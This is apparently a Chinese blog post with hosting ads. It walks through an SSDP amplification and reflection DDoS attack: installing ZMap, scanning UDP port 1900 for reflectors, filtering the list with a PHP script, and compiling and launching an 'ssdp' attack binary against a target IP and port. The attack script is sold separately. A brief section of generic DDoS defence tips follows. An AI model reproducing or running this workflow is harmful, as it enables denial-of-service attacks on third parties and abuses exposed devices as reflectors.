搬瓦工注册链接:精品稳定服务器购买

ZMap安装

由于系统很多,不同的系统有不同的安装方法,具体如下:

 

1、Debian 和 Ubuntu 安装命令:

sudo apt install zmap

 

2、Fedora、 CentOS 和 RHEL 安装命令:

sudo yum install zmap

 

3、macOS

brew install zmap

 

4、Arch Linux

sudo pacman -S zmap

 

SSDP放大反射攻击扫描教程,放大列表扫描教程!

我用的是centos 64位

先更新系统

yum -y update

区分centos6 centos7 执行不同的命令!

Centos 6
wget http://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm
sudo rpm -Uvh epel-release-6-8.noarch.rpm
centos 7 
wget http://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-5.noarch.rpm
sudo rpm -Uvh epel-release-7-5.noarch.rpm
     https://dl.fedoraproject.org/pub/epel/7/x86_64/Packages/e/epel-release-7-12.noarch.rpm

安装必要的依赖环境!

yum -y install gcc libcap libpcap libpcap-devel screen php dstat cmake gmp gmp-devel gengetopt byacc flex git json-c cpan vnstat zmap

上传这里的文件到你的机器!

开始扫描SSDP放大列表

screen zmap -M udp -p 1900 --probe-args=file:upnp_1900.pkt -o ssdp.txt

等扫描完成后,我们开始执行过滤!

php ssdpfilter.php ssdp.txt ssdpfiltered.txt 200 1000

然后,编译我们的攻击脚本,

gcc -pthread ssdp.c -o ssdp
./ssdp <target IP> <target port> <reflection file>  <time (optional)>

SSDP脚本下载:限时?钻石?会员5折优惠,免费更新服务。

特别提示:新手小白慎拍!此服务只包含密钥授权和版本免费更新,不提供任何额外其他服务!

五、总结

DDOS攻击很难通过某一种手段做到完全防御,很多中小型企业,没有能力也没有财力来对抗DDOS攻击。但通过下面的几点,还是可以做到简单的防御:

保证服务器系统的安全
首先要确保服务器软件没有任何漏洞,防止攻击者入侵。确保服务器采用最新系统,并打上安全补丁。在服务器上删除未使用的服务,关闭未使用的端口。对于服务器上运行的网站,确保其打了最新的补丁,没有安全漏洞。

隐藏服务器真实IP
服务器前端加CDN中转(免费的有百度云加速、360网站卫士、加速乐、安全宝等),如果资金充裕的话,可以购买高防的盾机,用于隐藏服务器真实IP,域名解析使用CDN的IP,所有解析的子域名都使用CDN的IP地址。此外,服务器上部署的其他域名也不能使用真实IP解析,全部都使用CDN来解析。

另外,防止服务器对外传送信息泄漏IP,最常见的是,服务器不使用发送邮件功能,如果非要发送邮件,可以通过第三方代理(例如sendcloud)发送,这样对外显示的IP是代理的IP。

总之,只要服务器的真实IP不泄露,10G以下小流量DDOS的预防花不了多少钱,免费的CDN就可以应付得了。如果攻击流量超过20G,那么免费的CDN可能就顶不住了,需要购买一个高防的盾机来应付了,而服务器的真实IP同样需要隐藏。
搬瓦工注册链接:

  1. 精品稳定服务器购买
声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。